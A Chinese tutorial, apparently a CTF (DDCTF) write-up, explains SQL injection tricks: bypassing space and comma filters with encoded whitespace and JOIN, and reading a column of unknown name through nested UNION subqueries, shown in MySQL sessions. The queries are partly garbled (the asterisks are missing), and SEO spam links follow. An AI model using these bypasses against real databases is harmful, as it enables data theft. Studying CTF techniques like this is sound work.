Mysql如何巧妙的绕过未知字段名详解
网络编程 2021-07-05 14:36www.168986.cn编程入门
这篇文章主要给大家介绍了Mysql如何巧妙的绕过未知字段名的相关资料,文中给出了详细的示例代码供大家参考学习,对学习mysql具有一定的参考学习价值,需要的朋友们狼蚁网站SEO优化来一起看看吧。
前言
本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,狼蚁网站SEO优化来看看详细的介绍
实现思路
题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;
存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下
思想就是获取flag,让其在已知字段名下出现;
示例代码
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ | a | b | c | d | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ 1 row in set (0.00 sec) mysql> select from (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ 1 row in set (0.00 sec) mysql> select from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select from user; +---+-------+----------+-------------+ | 1 | 2 | 3 | 4 | +---+-------+----------+-------------+ | 1 | 2 | 3 | 4 | | 1 | admin | admin888 | 110@110. | | 2 | test | test123 | 119@119. | | 3 | cs | cs123 | 120@120. | +---+-------+----------+-------------+ 4 rows in set (0.01 sec) mysql> select e.4 from (select from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select from user)e; +-------------+ | 4 | +-------------+ | 4 | | 110@110. | | 119@119. | | 120@120. | +-------------+ 4 rows in set (0.03 sec) mysql> select e.4 from (select from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select from user)e limit 1 offset 3; +-------------+ | 4 | +-------------+ | 120@120. | +-------------+ 1 row in set (0.01 sec) mysql> select from user where id=1 union select (select e.4 from (select from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i; +-------------+----------+----------+-------------+ | id | username | password | email | +-------------+----------+----------+-------------+ | 1 | admin | admin888 | 110@110. | | 120@120. | 1 | 1 | 1 | +-------------+----------+----------+-------------+ 2 rows in set (0.04 sec)
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对狼蚁SEO的支持。
上一篇:mysql 触发器用法实例详解
下一篇:SQL计算timestamp的差值的方法
编程语言
- 宿迁百度关键词排名指南:实现精准营销的关键
- 四川SEO优化怎么做网络推广
- 立昂技术备案老域名收购:如何为您的业务赋能
- 安徽百度关键词seo贵不贵,一般需要多少钱
- 吉林百度快照排名怎么做电话营销
- 多伦新手做SEO怎么做
- 甘肃优化关键词排名推广怎么做论坛营销
- 沙雅SEO网站推广:提升您的在线可见性
- 四川SEO优化如何提升销售额和销售量
- 聂荣网站排名优化:提升网站可见性的全方位指
- 涞水SEO:提升地方企业在线可见性的策略
- 辽宁百度seo排名怎样做网站排名
- 临湘哪有关键词排名优化:提升网站可见度的关
- 黑龙江百度网站优化有没有优惠
- 凉城优化关键词排名推广:提升您的网络可见性
- 萝北整站优化:提升您网站流量和排名的全面指